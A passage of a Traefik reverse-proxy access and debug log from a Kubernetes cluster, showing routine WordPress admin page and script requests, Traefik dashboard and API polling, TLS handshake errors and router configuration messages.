/wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=hoverIntent,wp-polyfill-inert,regenerator-runtime,wp-polyfill,wp-hooks&ver=6.4.3 HTTP/2.0" 200 42287 "-" "-" 616 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 10ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-admin/js/common.min.js?ver=6.4.3 HTTP/2.0" 200 7226 "-" "-" 618 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/hoverintent-js.min.js?ver=2.2.1 HTTP/2.0" 200 718 "-" "-" 619 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/admin-bar.min.js?ver=6.4.3 HTTP/2.0" 200 1396 "-" "-" 620 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/clipboard.min.js?ver=2.0.11 HTTP/2.0" 200 3150 "-" "-" 621 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3ca HTTP/2.0" 200 331 "-" "-" 622 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/dist/a11y.min.js?ver=7032343a947cfccf5608 HTTP/2.0" 200 960 "-" "-" 623 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/api-request.min.js?ver=6.4.3 HTTP/2.0" 200 590 "-" "-" 624 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/dist/url.min.js?ver=b4979979018b684be209 HTTP/2.0" 200 3863 "-" "-" 625 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-admin/js/site-health.min.js?ver=6.4.3 HTTP/2.0" 200 2203 "-" "-" 626 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:58 +0000] "GET /wp-includes/js/wp-ajax-response.min.js?ver=6.4.3 HTTP/2.0" 200 1079 "-" "-" 627 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/jquery/jquery.color.min.js?ver=2.2.0 HTTP/2.0" 200 2904 "-" "-" 628 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/wp-lists.min.js?ver=6.4.3 HTTP/2.0" 200 2534 "-" "-" 629 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/quicktags.min.js?ver=6.4.3 HTTP/2.0" 200 3509 "-" "-" 630 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/jquery/jquery.query.js?ver=2.2.3 HTTP/2.0" 200 1627 "-" "-" 631 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-admin/js/edit-comments.min.js?ver=6.4.3 HTTP/2.0" 200 5110 "-" "-" 632 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 HTTP/2.0" 200 7099 "-" "-" 633 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2 HTTP/2.0" 200 1085 "-" "-" 634 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/jquery/ui/sortable.min.js?ver=1.13.2 HTTP/2.0" 200 6565 "-" "-" 635 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-admin/js/postbox.min.js?ver=6.4.3 HTTP/2.0" 200 2221 "-" "-" 636 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:41:59 +0000] "GET /wp-includes/js/dist/vendor/moment.min.js?ver=2.29.4 HTTP/2.0" 200 18545 "-" "-" 637 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 5ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777a HTTP/2.0" 200 456 "-" "-" 638 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/dist/date.min.js?ver=936c461ad5dce9c2c8ea HTTP/2.0" 200 43578 "-" "-" 639 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 13ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-admin/js/dashboard.min.js?ver=6.4.3 HTTP/2.0" 200 3062 "-" "-" 640 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 HTTP/2.0" 200 4015 "-" "-" 641 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-admin/js/plugin-install.min.js?ver=6.4.3 HTTP/2.0" 200 1021 "-" "-" 642 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/wp-sanitize.min.js?ver=6.4.3 HTTP/2.0" 200 284 "-" "-" 643 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-admin/js/updates.min.js?ver=6.4.3 HTTP/2.0" 200 9148 "-" "-" 644 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/shortcode.min.js?ver=6.4.3 HTTP/2.0" 200 1145 "-" "-" 645 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-admin/js/media-upload.min.js?ver=6.4.3 HTTP/2.0" 200 613 "-" "-" 646 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-admin/js/svg-painter.js?ver=6.4.3 HTTP/2.0" 200 2125 "-" "-" 647 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:00 +0000] "GET /wp-includes/js/heartbeat.min.js?ver=6.4.3 HTTP/2.0" 200 2056 "-" "-" 648 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/wp-auth-check.min.js?ver=6.4.3 HTTP/2.0" 200 773 "-" "-" 649 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/wplink.min.js?ver=6.4.3 HTTP/2.0" 200 3878 "-" "-" 650 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/jquery/ui/menu.min.js?ver=1.13.2 HTTP/2.0" 200 3022 "-" "-" 651 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.2 HTTP/2.0" 200 2877 "-" "-" 652 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.4.3 HTTP/2.0" 200 5039 "-" "-" 653 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-includes/js/thickbox/loadingAnimation.gif HTTP/2.0" 200 15238 "-" "-" 656 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 97 "-" "-" 655 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 192ms +10.2.1.1 - - [30/Mar/2024:07:42:02 +0000] "GET /favicon.ico HTTP/2.0" 301 0 "-" "-" 658 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 34ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-admin/admin-ajax.php?action=dashboard-widgets&widget=dashboard_primary&pagenow=dashboard HTTP/2.0" 200 376 "-" "-" 657 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 622ms +10.2.1.1 - - [30/Mar/2024:07:42:02 +0000] "GET /favicon.ico/ HTTP/2.0" 200 15816 "-" "-" 659 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 88ms +10.2.1.1 - - [30/Mar/2024:07:42:02 +0000] "POST /wp-cron.php?doing_wp_cron=1711784521.6790540218353271484375 HTTP/1.1" 200 0 "-" "-" 660 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 54ms +10.2.1.1 - - [30/Mar/2024:07:42:01 +0000] "GET /wp-admin/admin-ajax.php?action=wp-compression-test&test=1&_ajax_nonce=a8a0924f52&1711784521626 HTTP/2.0" 200 574 "-" "-" 654 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 861ms +10.2.1.1 - - [30/Mar/2024:07:42:02 +0000] "GET /wp-admin/admin-ajax.php?action=wp-compression-test&test=no&_ajax_nonce=a8a0924f52&1711784522764 HTTP/2.0" 200 1 "-" "-" 661 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 28ms +time="2024-03-30T07:42:04Z" level=debug msg="http: TLS handshake error from 10.0.0.4:43846: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:42:05 +0000] "GET /wp-admin/plugin-install.php HTTP/2.0" 200 14941 "-" "-" 662 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 368ms +10.2.1.1 - - [30/Mar/2024:07:42:05 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5Bchunk_1%5D=,site-icon,l10n,buttons,wp-auth-check&ver=6.4.3 HTTP/2.0" 200 99667 "-" "-" 663 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 17ms +10.2.1.1 - - [30/Mar/2024:07:42:06 +0000] "GET /wp-admin/images/spinner.gif HTTP/2.0" 200 3656 "-" "-" 664 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.2.1.1 - - [30/Mar/2024:07:42:06 +0000] "GET /favicon.ico HTTP/2.0" 301 0 "-" "-" 665 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 29ms +10.2.1.1 - - [30/Mar/2024:07:42:07 +0000] "GET /favicon.ico/ HTTP/2.0" 200 15816 "-" "-" 666 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 75ms +time="2024-03-30T07:42:14Z" level=debug msg="http: TLS handshake error from 10.0.0.4:59942: remote error: tls: unknown certificate" +time="2024-03-30T07:42:15Z" level=debug msg="http: TLS handshake error from 10.2.1.1:1638: remote error: tls: unknown certificate" +time="2024-03-30T07:42:15Z" level=debug msg="http: TLS handshake error from 10.2.0.129:45169: remote error: tls: unknown certificate" +10.0.0.4 - - [30/Mar/2024:07:42:15 +0000] "GET /favicon.ico HTTP/2.0" 301 0 "-" "-" 667 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 39ms +10.0.0.4 - - [30/Mar/2024:07:42:15 +0000] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 108708 "-" "-" 668 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 331ms +10.0.0.4 - - [30/Mar/2024:07:42:15 +0000] "GET /favicon.ico/ HTTP/2.0" 200 15816 "-" "-" 669 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 78ms +10.2.0.129 - - [30/Mar/2024:07:42:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 764 "-" "-" 670 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:42:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 671 "api@internal" "-" 0ms +time="2024-03-30T07:42:29Z" level=debug msg="http: TLS handshake error from 10.2.0.129:55645: remote error: tls: unknown certificate" +time="2024-03-30T07:43:07Z" level=debug msg="http: TLS handshake error from 10.0.0.4:37236: remote error: tls: unknown certificate" +time="2024-03-30T07:43:08Z" level=debug msg="http: TLS handshake error from 10.2.1.1:49559: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:43:09 +0000] "POST /wp-cron.php?doing_wp_cron=1711784588.4603850841522216796875 HTTP/1.1" 200 0 "-" "-" 673 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 41ms +10.2.0.129 - - [30/Mar/2024:07:43:08 +0000] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 47 "-" "-" 672 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 734ms +time="2024-03-30T07:43:10Z" level=debug msg="Configuration received: {\"http\":{\"routers\":{\"akashop-wp-whoami-172-233-168-9-nip-io\":{\"entryPoints\":[\"web\"],\"service\":\"akashop-wp-80\",\"rule\":\"Host(`whoami.172.233.168.9.nip.io`) \\u0026\\u0026 PathPrefix(`/`)\"}},\"services\":{\"akashop-wp-80\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.2.1.35:80\"}],\"passHostHeader\":true}}}},\"tcp\":{},\"udp\":{}}" providerName=kubernetes +time="2024-03-30T07:43:10Z" level=debug msg="Adding certificate for domain(s) whoami.172.233.168.9.nip.io" +time="2024-03-30T07:43:10Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:43:10Z" level=debug msg="Creating middleware" serviceName=akashop-wp-80 middlewareType=Pipelining middlewareName=pipelining entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:43:10Z" level=debug msg="Creating load-balancer" serviceName=akashop-wp-80 entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:43:10Z" level=debug msg="Creating server 0 http://10.2.1.35:80" serviceName=akashop-wp-80 serverName=0 entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:43:10Z" level=debug msg="child http://10.2.1.35:80 now UP" +time="2024-03-30T07:43:10Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:43:10Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" middlewareName=tracing middlewareType=TracingForwarder entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:43:10Z" level=debug msg="Creating middleware" entryPointName=web middlewareType=Recovery middlewareName=traefik-internal-recovery +time="2024-03-30T07:43:10Z" level=debug msg="Added outgoing tracing middleware api@internal" middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik routerName=api@internal +time="2024-03-30T07:43:10Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" routerName=dashboard@internal middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik +time="2024-03-30T07:43:10Z" level=debug msg="Creating middleware" middlewareName=dashboard_stripprefix@internal middlewareType=StripPrefix entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:43:10Z" level=debug msg="Adding tracing to middleware" routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal entryPointName=traefik +time="2024-03-30T07:43:10Z" level=debug msg="Creating middleware" entryPointName=traefik routerName=dashboard@internal middlewareType=RedirectRegex middlewareName=dashboard_redirect@internal +time="2024-03-30T07:43:10Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" entryPointName=traefik routerName=dashboard@internal middlewareType=RedirectRegex middlewareName=dashboard_redirect@internal +time="2024-03-30T07:43:10Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:43:10Z" level=debug msg="Creating middleware" entryPointName=traefik middlewareName=traefik-internal-recovery middlewareType=Recovery +10.2.0.129 - - [30/Mar/2024:07:43:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 674 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 675 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:25 +0000] "GET / HTTP/1.1" 200 14510 "-" "-" 676 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 91ms +10.2.0.129 - - [30/Mar/2024:07:43:43 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 677 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:43 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 678 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:46 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 679 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:47 +0000] "GET /dashboard/css/app.d96a5235.css HTTP/1.1" 200 4333 "-" "-" 681 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:47 +0000] "GET /dashboard/css/vendor.609cd54c.css HTTP/1.1" 200 224744 "-" "-" 680 "dashboard@internal" "-" 2ms +10.2.1.1 - - [30/Mar/2024:07:43:47 +0000] "GET /dashboard/js/app.abf00464.js HTTP/1.1" 200 41280 "-" "-" 683 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:47 +0000] "GET /dashboard/js/vendor.5cc359a9.js HTTP/1.1" 200 1223091 "-" "-" 682 "dashboard@internal" "-" 125ms +10.0.0.4 - - [30/Mar/2024:07:43:48 +0000] "GET /dashboard/css/8.cb89174c.css HTTP/1.1" 200 944 "-" "-" 684 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:48 +0000] "GET /dashboard/css/chunk-common.52fcdaa7.css HTTP/1.1" 200 4938 "-" "-" 685 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:48 +0000] "GET /dashboard/js/8.7e674596.js HTTP/1.1" 200 18550 "-" "-" 686 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:48 +0000] "GET /dashboard/js/chunk-common.5363bb20.js HTTP/1.1" 200 52039 "-" "-" 687 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/css/2.fea02e71.css HTTP/1.1" 200 662 "-" "-" 688 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/js/2.f326ab8a.js HTTP/1.1" 200 2645 "-" "-" 689 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/js/11.a675a95e.js HTTP/1.1" 200 1950 "-" "-" 690 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 691 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 692 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /api/version HTTP/1.1" 200 86 "-" "-" 693 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/fonts/flUhRq6tzZclQEJ-Vdg-IuiaDsNcIhQ8tQ.c5371cfb.woff2 HTTP/1.1" 200 128616 "-" "-" 694 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/fonts/nunito-v11-latin-600.5a8861ee.woff2 HTTP/1.1" 200 20084 "-" "-" 695 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/fonts/Eva-Icons.ac165c67.woff2 HTTP/1.1" 200 25952 "-" "-" 696 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/fonts/nunito-v11-latin-regular.e1a82f09.woff2 HTTP/1.1" 200 19976 "-" "-" 697 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/fonts/nunito-v11-latin-700.bf2c237c.woff2 HTTP/1.1" 200 20128 "-" "-" 698 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/providers/kubernetes.svg HTTP/1.1" 200 4605 "-" "-" 699 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:43:49 +0000] "GET /dashboard/providers/internal.svg HTTP/1.1" 200 3681 "-" "-" 700 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=2 HTTP/1.1" 400 53 "-" "-" 701 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:50 +0000] "GET /dashboard/fonts/KFOlCnqEu92Fr1MmYUtfBBc-.f5677eb2.woff HTTP/1.1" 200 20424 "-" "-" 702 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:50 +0000] "GET /dashboard/icons/favicon.ico HTTP/1.1" 200 10134 "-" "-" 703 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 704 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 705 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:43:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 706 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:43:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 707 "api@internal" "-" 0ms +time="2024-03-30T07:44:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:07:44:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 708 "-" "-" 0ms +time="2024-03-30T07:44:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:07:44:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 709 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 710 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:04 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 711 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 712 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 713 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 714 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 715 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 716 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 717 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 718 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:25 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 719 "api@internal" "-" 0ms +time="2024-03-30T07:44:28Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T07:44:28Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T07:44:28Z" level=debug msg="http: TLS handshake error from 10.0.0.4:50439: remote error: tls: unknown certificate" +time="2024-03-30T07:44:28Z" level=debug msg="http: TLS handshake error from 10.2.1.1:45746: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:44:28 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 720 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 721 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 722 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 723 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 724 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:36 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 725 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:37 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 726 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 727 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 728 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:45 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 729 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:45 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 730 "api@internal" "-" 0ms +10.2.1.1 - - 